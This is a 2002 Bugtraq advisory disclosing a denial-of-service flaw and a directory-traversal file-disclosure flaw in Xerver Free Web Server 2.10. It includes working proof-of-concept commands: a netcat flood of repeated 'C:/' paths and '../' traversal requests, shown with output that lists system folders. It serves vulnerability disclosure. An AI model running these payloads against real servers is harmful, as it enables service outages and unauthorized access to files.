Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Xerver-2.10-File-Disclousure&DoS-attack

From: Alex Hernandez <al3xhernandez () ureach com>
Date: Fri, 8 Mar 2002 18:39:39 -0500
------oOo------
Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of 
Service
Attack).
------oOo------

Company Affected: www.JavaScript.nu
Version: v2.10
Date Added: 02-27-02
Size: 287 KB
OS Affected: : Windows ALL, Linux ALL, BSD all, Solaris ALL, 
MAC ALL.

Author:

** Alex Hernandez <al3xhernandez () ureach com>
** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

Also a greet to "KF" <dotslash () snosoft com>
http://www.snosoft.com for invitme to participate for more 
research about the Bugs, Exploits and Vulnerabilities :-) 
thanks friend, u have publish exelents bugs :X 

----=[Brief Description]=------------


Xerver Free Web Server is a tiny web server allowing you to run 
CGI/perl
scripts on 
your computer. Xerver includes features such as: Allow/forbid 
directory
listing, 
create your own error pages ("404 File Not Found"), allow/deny
CGI-scripts, choose 
your own index file extensions, share/unshare hidden files or 
files with
certain 
file extensions, share unlimited folders etc. Xerver is a tiny, 
fast and
free web 
server, but is still advanced and supports both HTTP/1.1 and 
HTTP/1.0
and all HTTP 
methods (GET, POST and HEAD)."Run CGI/perl scripts on your 
computer.


----=[Summary]=----------------------

Exist two vulnerabilities:


The port 32123 usually is configuration of the server , exist a 
one
metod for crass this
system calling the drive C:\ several times, another bug exists 
on server
remote any 
user can see all the files configuration on the system also 
even though
one has formed 
the services to deny the folders or files any user can access 
via remote
to 80 port 
finding the configuration of the own server.


------oOo------
Proof of concept


DoS

http://localhost:32123 

$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn
127.0.0.1 32123


Explotation:

Example 1:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY
BGCOLOR=white COL
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory 
Listing for
/</H2></F
ONT><PRE>    <B>File name                       File
size&nb
sp;    Last modified</B>


Program Files
----------------------------------------------------------------
----------------
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFold
er" BORDER=0> Program Files</A>
----------------------------------------------------------------
----------------

RECYCLER
----------------------------------------------------------------
----------------
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" B
ORDER=0> RECYCLER</A>
----------------------------------------------------------------
----------------

WINNT
----------------------------------------------------------------
----------------
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" BORD
ER=0> WINNT</A>
----------------------------------------------------------------
---------------

[...]

or via web:



http://localhost/unix/ALEX/Xerver2.10/../../../ 

Directory Listing for /

    File name                       File size     Last modified

 $unix
 ALEX
 Documents and Settings
 My Downloads
 Program Files
 RECYCLER

[...]


Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

The results is: 

Directory Listing for /WINNT/system32/


File name                             File size     Last 
modified
 ../
 AdCache
 CatRoot
 Com
 DTCLog
 DirectX
 GroupPolicy
 Hummbird
 IOSUBSYS
 Macromed
 Microsoft

[...]


------oOo------------------------------------
Vendor Response:
The vendor was notified
"Omid Rouhani" webmaster () javascript nu
htttp://www.JavaScript.nu
Patch Temporary: Restricted files and Directories

Alex Hernandez <al3xhernandez () ureach com> (c) 2002.

------oOo------------------------------------



________________________________________________
Get your own "800" number
Voicemail, fax, email, and a lot more
http://www.ureach.com/reg/tag
Previous By Date Next
Previous By Thread Next

Current thread: